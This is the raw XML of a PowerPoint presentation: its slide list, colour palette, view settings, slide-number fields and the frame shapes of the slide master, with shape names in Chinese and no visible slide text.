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7" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId50"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId51"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="9228" r:id="rId2"/>
    <p:sldId id="9234" r:id="rId3"/>
    <p:sldId id="9306" r:id="rId4"/>
    <p:sldId id="9307" r:id="rId5"/>
    <p:sldId id="9308" r:id="rId6"/>
    <p:sldId id="9309" r:id="rId7"/>
    <p:sldId id="9310" r:id="rId8"/>
    <p:sldId id="9311" r:id="rId9"/>
    <p:sldId id="9312" r:id="rId10"/>
    <p:sldId id="9313" r:id="rId11"/>
    <p:sldId id="9314" r:id="rId12"/>
    <p:sldId id="9315" r:id="rId13"/>
    <p:sldId id="9316" r:id="rId14"/>
    <p:sldId id="9317" r:id="rId15"/>
    <p:sldId id="9305" r:id="rId16"/>
    <p:sldId id="9319" r:id="rId17"/>
    <p:sldId id="9320" r:id="rId18"/>
    <p:sldId id="9321" r:id="rId19"/>
    <p:sldId id="9322" r:id="rId20"/>
    <p:sldId id="9323" r:id="rId21"/>
    <p:sldId id="9324" r:id="rId22"/>
    <p:sldId id="9325" r:id="rId23"/>
    <p:sldId id="9326" r:id="rId24"/>
    <p:sldId id="9327" r:id="rId25"/>
    <p:sldId id="9328" r:id="rId26"/>
    <p:sldId id="9329" r:id="rId27"/>
    <p:sldId id="9330" r:id="rId28"/>
    <p:sldId id="9331" r:id="rId29"/>
    <p:sldId id="9332" r:id="rId30"/>
    <p:sldId id="9335" r:id="rId31"/>
    <p:sldId id="9334" r:id="rId32"/>
    <p:sldId id="9337" r:id="rId33"/>
    <p:sldId id="9338" r:id="rId34"/>
    <p:sldId id="9339" r:id="rId35"/>
    <p:sldId id="9340" r:id="rId36"/>
    <p:sldId id="9341" r:id="rId37"/>
    <p:sldId id="9342" r:id="rId38"/>
    <p:sldId id="9343" r:id="rId39"/>
    <p:sldId id="9344" r:id="rId40"/>
    <p:sldId id="9346" r:id="rId41"/>
    <p:sldId id="9345" r:id="rId42"/>
    <p:sldId id="9347" r:id="rId43"/>
    <p:sldId id="9348" r:id="rId44"/>
    <p:sldId id="9349" r:id="rId45"/>
    <p:sldId id="9350" r:id="rId46"/>
    <p:sldId id="9351" r:id="rId47"/>
    <p:sldId id="9352" r:id="rId48"/>
    <p:sldId id="9353" r:id="rId49"/>
  </p:sldIdLst>
  <p:sldSz cx="12858750" cy="7232650"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId52"/>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0A3"/>
    <a:srgbClr val="1092F1"/>
    <a:srgbClr val="007DFA"/>
    <a:srgbClr val="969696"/>
    <a:srgbClr val="2278F4"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="FF3B5E"/>
    <a:srgbClr val="18A6FF"/>
    <a:srgbClr val="F2F2F2"/>
    <a:srgbClr val="4B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33" autoAdjust="0"/>
    <p:restoredTop sz="86691" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="1102" y="29"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="328"/>
        <p:guide pos="4050"/>
        <p:guide pos="557"/>
        <p:guide orient="horz" pos="4183"/>
        <p:guide pos="7497"/>
        <p:guide pos="6908"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>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7" d="100"/>
          <a:sy n="67" d="100"/>
        </p:scale>
        <p:origin x="283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2022/2/9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2022/2/9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71290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3179763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2335257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2968985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400594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48870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37564467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1270481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3620633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3911723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1525783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2378327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20</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4212119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p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38737365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22</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16394765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23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8759876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24</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31491058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25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42397761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17807308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27</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18880921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val="821531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29</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3536761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30644381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30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12581303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31</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31104437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32</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38348219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33</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36776565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34</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23931630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35</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38867174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36</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8043669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37</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13128381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38</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28116160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39</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="733981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10682611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40</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28310111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41</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1086733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42</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35163771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43</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31354676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44</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38348880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45</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30075852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46</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42367348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47</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28461827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48</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1568894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718876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3554906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3004368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163308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22281979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6B58CA9C-A61B-4218-B89C-765C4AE4CBCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="12858243" cy="7232650"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="11520489" cy="6480175"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="矩形 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAE98536-CFB6-41B1-A838-44066568C945}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="71612" y="71736"/>
              <a:ext cx="11377264" cy="6336703"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:sysClr val="window" lastClr="FFFFFF">
                  <a:lumMod val="65000"/>
                </a:sysClr>
              </a:solid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任意多边形: 形状 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBBE4815-B6B0-4394-BC94-8AAD066B124D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="275597" y="-275598"/>
              <a:ext cx="1403883" cy="1955080"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY0" fmla="*/ 1573594 h 1955080"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY1" fmla="*/ 1955080 h 1955080"/>
                <a:gd name="connsiteX2" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY2" fmla="*/ 1859708 h 1955080"/>
                <a:gd name="connsiteX3" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY3" fmla="*/ 1716691 h 1955080"/>
                <a:gd name="connsiteX4" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY4" fmla="*/ 1716691 h 1955080"/>
                <a:gd name="connsiteX5" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY5" fmla="*/ 95372 h 1955080"/>
                <a:gd name="connsiteX6" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY6" fmla="*/ 95372 h 1955080"/>
                <a:gd name="connsiteX7" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY7" fmla="*/ 95371 h 1955080"/>
                <a:gd name="connsiteX8" fmla="*/ 1308511 w 1403883"/>
                <a:gd name="connsiteY8" fmla="*/ 95371 h 1955080"/>
                <a:gd name="connsiteX9" fmla="*/ 1403883 w 1403883"/>
                <a:gd name="connsiteY9" fmla="*/ 0 h 1955080"/>
                <a:gd name="connsiteX10" fmla="*/ 1022396 w 1403883"/>
                <a:gd name="connsiteY10" fmla="*/ 0 h 1955080"/>
                <a:gd name="connsiteX11" fmla="*/ 1022395 w 1403883"/>
                <a:gd name="connsiteY11" fmla="*/ 1 h 1955080"/>
                <a:gd name="connsiteX12" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY12" fmla="*/ 1 h 1955080"/>
                <a:gd name="connsiteX13" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY13" fmla="*/ 47686 h 1955080"/>
                <a:gd name="connsiteX14" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY14" fmla="*/ 47686 h 1955080"/>
                <a:gd name="connsiteX15" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY15" fmla="*/ 1573594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0" y="1573594"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1955080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1859708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1716691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1716691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="95371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1308511" y="95371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1403883" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022396" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022395" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="47686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="47686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1573594"/>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8" name="任意多边形: 形状 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47B1F7C7-679E-4D38-A62B-40F1A8E86F21}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="9843121" y="4802808"/>
              <a:ext cx="1403883" cy="1950851"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1403883 w 1403883"/>
                <a:gd name="connsiteY0" fmla="*/ 1950851 h 1950851"/>
                <a:gd name="connsiteX1" fmla="*/ 1022396 w 1403883"/>
                <a:gd name="connsiteY1" fmla="*/ 1950851 h 1950851"/>
                <a:gd name="connsiteX2" fmla="*/ 1022395 w 1403883"/>
                <a:gd name="connsiteY2" fmla="*/ 1950850 h 1950851"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY3" fmla="*/ 1950850 h 1950851"/>
                <a:gd name="connsiteX4" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY4" fmla="*/ 1903165 h 1950851"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY5" fmla="*/ 1903165 h 1950851"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY6" fmla="*/ 381486 h 1950851"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY7" fmla="*/ 234161 h 1950851"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 1950851"/>
                <a:gd name="connsiteX9" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY9" fmla="*/ 95372 h 1950851"/>
                <a:gd name="connsiteX10" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY10" fmla="*/ 234161 h 1950851"/>
                <a:gd name="connsiteX11" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY11" fmla="*/ 476858 h 1950851"/>
                <a:gd name="connsiteX12" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY12" fmla="*/ 1855479 h 1950851"/>
                <a:gd name="connsiteX13" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY13" fmla="*/ 1855479 h 1950851"/>
                <a:gd name="connsiteX14" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY14" fmla="*/ 1855480 h 1950851"/>
                <a:gd name="connsiteX15" fmla="*/ 1308511 w 1403883"/>
                <a:gd name="connsiteY15" fmla="*/ 1855480 h 195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0851">
                  <a:moveTo>
                    <a:pt x="1403883" y="1950851"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1022396" y="1950851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022395" y="1950850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="1950850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="1903165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1903165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="381486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="234161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="234161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="476858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1855479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="1855479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="1855480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1308511" y="1855480"/>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9" name="任意多边形: 形状 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C32D3D-90D7-4CB2-BA03-C77D89B0E7E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="9840777" y="-275599"/>
              <a:ext cx="1403883" cy="1955081"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY0" fmla="*/ 1716692 h 1955081"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY1" fmla="*/ 47687 h 1955081"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY2" fmla="*/ 47687 h 1955081"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY3" fmla="*/ 0 h 1955081"/>
                <a:gd name="connsiteX4" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1955081"/>
                <a:gd name="connsiteX5" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 1955081"/>
                <a:gd name="connsiteX6" fmla="*/ 1403883 w 1403883"/>
                <a:gd name="connsiteY6" fmla="*/ 1 h 1955081"/>
                <a:gd name="connsiteX7" fmla="*/ 1308511 w 1403883"/>
                <a:gd name="connsiteY7" fmla="*/ 95372 h 1955081"/>
                <a:gd name="connsiteX8" fmla="*/ 927024 w 1403883"/>
                <a:gd name="connsiteY8" fmla="*/ 95372 h 1955081"/>
                <a:gd name="connsiteX9" fmla="*/ 927025 w 1403883"/>
                <a:gd name="connsiteY9" fmla="*/ 95371 h 1955081"/>
                <a:gd name="connsiteX10" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY10" fmla="*/ 95371 h 1955081"/>
                <a:gd name="connsiteX11" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY11" fmla="*/ 1478223 h 1955081"/>
                <a:gd name="connsiteX12" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY12" fmla="*/ 1478223 h 1955081"/>
                <a:gd name="connsiteX13" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY13" fmla="*/ 1859709 h 1955081"/>
                <a:gd name="connsiteX14" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY14" fmla="*/ 1955081 h 1955081"/>
                <a:gd name="connsiteX15" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY15" fmla="*/ 1716692 h 1955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1">
                  <a:moveTo>
                    <a:pt x="0" y="1716692"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="47687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="47687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1403883" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1308511" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927024" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927025" y="95371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="95371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1478223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1478223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1859709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1955081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1716692"/>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0" name="任意多边形: 形状 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F697906-39C1-47C3-ADE4-53420E13B68E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="275598" y="4800693"/>
              <a:ext cx="1403883" cy="1955080"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1403883 w 1403883"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 1955080"/>
                <a:gd name="connsiteX1" fmla="*/ 1308511 w 1403883"/>
                <a:gd name="connsiteY1" fmla="*/ 95372 h 1955080"/>
                <a:gd name="connsiteX2" fmla="*/ 927024 w 1403883"/>
                <a:gd name="connsiteY2" fmla="*/ 95372 h 1955080"/>
                <a:gd name="connsiteX3" fmla="*/ 927025 w 1403883"/>
                <a:gd name="connsiteY3" fmla="*/ 95371 h 1955080"/>
                <a:gd name="connsiteX4" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY4" fmla="*/ 95371 h 1955080"/>
                <a:gd name="connsiteX5" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY5" fmla="*/ 1478222 h 1955080"/>
                <a:gd name="connsiteX6" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY6" fmla="*/ 1716691 h 1955080"/>
                <a:gd name="connsiteX7" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY7" fmla="*/ 1859708 h 1955080"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY8" fmla="*/ 1955080 h 1955080"/>
                <a:gd name="connsiteX9" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY9" fmla="*/ 1716691 h 1955080"/>
                <a:gd name="connsiteX10" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY10" fmla="*/ 1573594 h 1955080"/>
                <a:gd name="connsiteX11" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY11" fmla="*/ 47686 h 1955080"/>
                <a:gd name="connsiteX12" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY12" fmla="*/ 47686 h 1955080"/>
                <a:gd name="connsiteX13" fmla="*/ 1 w 1403883"/>
